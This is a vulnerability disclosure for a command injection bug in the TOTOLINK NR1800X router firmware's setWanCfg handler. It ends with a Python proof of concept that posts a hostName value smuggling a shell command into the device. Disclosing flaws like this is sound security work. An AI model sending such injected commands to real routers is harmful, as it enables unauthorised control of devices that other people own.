Overview

• Manufacturer's website information：https://www.totolink.net/
• Firmware download address ：https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/225/ids/36.html

Affected version

NR1800X_Firmware V9.1.0u.6279_B20210910

Vulnerability details

In the NR1800X_Firmware V9.1.0u.6279_B20210910 has a command injection vulnerability in the setWanCfg function. The v48 variable receives the hostName parameter from a POST request. However, since the user can control the input of hostName, the statement doSystem can cause a buffer command injection vulnerability.

POC

import requests
url = "<http://127.0.0.1/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {
		"topicurl":"setWanCfg",
		"hostName":"';ls -al ../ ;'",
		"proto":"80"
}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)